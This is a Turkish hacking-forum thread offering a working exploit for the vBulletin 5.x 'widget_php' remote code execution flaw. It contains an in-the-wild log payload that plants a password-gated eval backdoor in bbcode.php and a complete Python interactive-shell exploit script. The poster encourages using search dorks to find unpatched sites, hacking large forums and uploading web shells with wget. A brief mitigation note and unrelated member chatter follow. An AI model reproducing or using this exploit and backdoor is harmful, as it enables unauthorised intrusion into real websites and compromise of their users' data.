• Hack kategorilerindeki birçok içerik Gizli içeriktir yani sadece cevap yazarakı erişebileceğiniz türden içeriklerdir, ancak yeni üyelerin hack kategorilerine cevap yazması engellenmiştir ! spam ve sömürüye karşı bir tedbirdir, forumumuza katkı sunarsanız rütbeniz kısa sürede yükselir ve tüm forumu engelsiz kullanabilirsiniz.

Zero-Day RCE in vBulletin v5.0.0-v5.5.4

Mectruy

Yaşlı Kurt
Security Risk: Critical
Exploitation Level:
Very Easy
DREAD Score: 9.4
Vulnerability: Remote Code Execution (RCE)
Patched Version: 5.5.2, 5.5.3, and 5.5.4

cpe:/a:vbulletin:vbulletin:5.5.4:
cpe:/a:vbulletin:vbulletin:5.5.3:
cpe:/a:vbulletin:vbulletin:5.5.2:
cpe:/a:vbulletin:vbulletin:5.5.1:
cpe:/a:vbulletin:vbulletin:5.5.0:
cpe:/a:vbulletin:vbulletin:5.5.4:
cpe:/a:vbulletin:vbulletin:5.4.5:
cpe:/a:vbulletin:vbulletin:5.4.4:
cpe:/a:vbulletin:vbulletin:5.4.3:
cpe:/a:vbulletin:vbulletin:5.4.2:
cpe:/a:vbulletin:vbulletin:5.4.1:
cpe:/a:vbulletin:vbulletin:5.4.0:
cpe:/a:vbulletin:vbulletin:5.3.4:
cpe:/a:vbulletin:vbulletin:5.3.3:
cpe:/a:vbulletin:vbulletin:5.3.2:
cpe:/a:vbulletin:vbulletin:5.3.1:
cpe:/a:vbulletin:vbulletin:5.3.0:
cpe:/a:vbulletin:vbulletin:5.2.6:
cpe:/a:vbulletin:vbulletin:5.2.5:
cpe:/a:vbulletin:vbulletin:5.2.4:
cpe:/a:vbulletin:vbulletin:5.2.3:
cpe:/a:vbulletin:vbulletin:5.2.0_patch_level_1:
cpe:/a:vbulletin:vbulletin:5.2.0_patch_level_2:
cpe:/a:vbulletin:vbulletin:5.2.2_patch_level_1:
cpe:/a:vbulletin:vbulletin:5.2.1_patch_level_1:
cpe:/a:vbulletin:vbulletin:5.2.0_patch_level_3:
cpe:/a:vbulletin:vbulletin:5.2.2:
cpe:/a:vbulletin:vbulletin:5.2.1:
cpe:/a:vbulletin:vbulletin:5.2.0:
cpe:/a:vbulletin:vbulletin:5.1.8:
cpe:/a:vbulletin:vbulletin:5.1.7:
cpe:/a:vbulletin:vbulletin:5.1.6:
cpe:/a:vbulletin:vbulletin:5.1.5:
cpe:/a:vbulletin:vbulletin:5.1.4:
cpe:/a:vbulletin:vbulletin:5.1.3:
cpe:/a:vbulletin:vbulletin:5.1.2:
cpe:/a:vbulletin:vbulletin:5.1.1:
cpe:/a:vbulletin:vbulletin:5.1.0:
cpe:/a:vbulletin:vbulletin:5.0.5:
cpe:/a:vbulletin:vbulletin:5.0.4:
cpe:/a:vbulletin:vbulletin:5.0.3:
cpe:/a:vbulletin:vbulletin:5.0.2:
cpe:/a:vbulletin:vbulletin:5.0.1:
cpe:/a:vbulletin:vbulletin:5.0:

Kullandığı payload
Kod:
202.141.232.162 - widgetConfig%5Bcode%5D=echo+shell_exec%28%27sed+-i+%5C%27s%2Feval%28%5C%24code%29%3B%2Fif+%28isset%28%5C%24_REQUEST%5B%5C%22epass%5C%22%5D%29+%5C%26%5C%26+%5C%24_REQUEST%5B%5C%22epass%5C%22%5D+%3D%3D+%5C%222dmfrb28nu3c6s9j%5C%22%29+%7B+eval%28%5C%24code%29%3B+%7D%2Fg%5C%27+includes%2Fvb5%2Ffrontend%2Fcontroller%2Fbbcode.php+%26%26+echo+-n+exploited+%7C+md5sum%27%29%3B+exit%3B [25/Sep/2019:18:01:16 +0000] "POST /index.php?routestring=ajax/render/widget_php HTTP/1.1" 200 5407 "-"
Vbulletinde kritik bir exploit olduğu ortaya çıktı, benimde haberim yoktu @Joker dün yazdı bir bak ne buldum dedi troll: bizde baktık birlikte hakkaten ilginç bir açık vermiş vbulletin, xenforada böyle bir açık çıktığını düşünmek bile sıkıcı bir durum olurdu. Dork konusunda iyi olanlar muhtemelen daha fix olmamış birçok site bulacaktır, hatta belki büyük forumları bile hackleyebileceksiniz.

Herhangi bir linux terminalden şu komutu çalıştırın

Python:
python vb.py http://hedefsite.com/forum
ardından ls komutunu çalıştırın gelen ekranda, eğer sitenin dosyaları alt alta listelenmişse açık vardır ve komutlar ile shell upload edin wget vs gibi.
EXPLOIT ektedir .txt olarak iner ancak uzantısını .py yapmanız gerekir.

açığa neden olan dosya:
index.php?routestring=ajax/render/widget_php
açığa neden olan dosyadaki ilgili bölüm

HTML:
<div class="widget-content">
            <vb:if condition="!empty($widgetConfig['code']) AND
!$vboptions['disable_php_rendering']">
                    {vb:action evaledPHP, bbcode, evalCode, {vb:raw widgetConfig.code}}
                    {vb:raw $evaledPHP}
            <vb:else />
                    <vb:if condition="$user['can_use_sitebuilder']">
                            <span class="note">{vb:phrase click_edit_to_config_module}</span>
                    </vb:if>
            </vb:if>
    </div>
Açığı nasıl kapatırım ?
Bu sorunu geçici olarak çözmek için yönetim panelinizden şuraya gidin:
Admincp >> Seçenekler >> Genel Ayarlar
Buradan, PHP'yi, Statik HTML'yi ve Reklam Modülü oluşturma ayarını devre dışı bırakın.
Vbulletin bunun için bir patch yayınladı hatalı kodlar için. Yukardaki çözüm şuanlık işinizi görür.
 

Ekli dosyalar

  • 651 bayt Görüntüleme: 27
Son düzenleme:

Mectruy

Yaşlı Kurt
teşekkürler ama dosyayı indiremiyorum yeni üye olduğum için mi ?
buyur

Python:
#!/usr/bin/python

import requests
import sys

if len(sys.argv) != 2:
    sys.exit("Usage: %s <URL to vBulletin>" % sys.argv[0])

params = {"routestring":"ajax/render/widget_php"}

while True:
     try:
          cmd = raw_input("vBulletin$ ")
          params["widgetConfig[code]"] = "echo shell_exec('"+cmd+"'); exit;"
          r = requests.post(url = sys.argv[1], data = params)
          if r.status_code == 200:
               print r.text
          else:
               sys.exit("Exploit failed!")
     except KeyboardInterrupt:
          sys.exit("\nClosing shell...")
     except Exception, e:
          sys.exit(str(e))
 
Security Risk: Critical
Exploitation Level:
Very Easy
DREAD Score: 9.4
Vulnerability: Remote Code Execution (RCE)
Patched Version: 5.5.2, 5.5.3, and 5.5.4
Kanka ben RemotE üye oldum sitene tekrar ama şifremi unuttum, emaile şifre istiyorum gelmiyor niye ? sorun mu var mail serverinda bi halledermisin ona göre kendi nickime geçeyim.
 
u54554211

fxbees

umrgaiba


kıymetini bilin fazla vermem he :D fena bi link paneli yaptım yakında satışa koyarım :D
 
Üst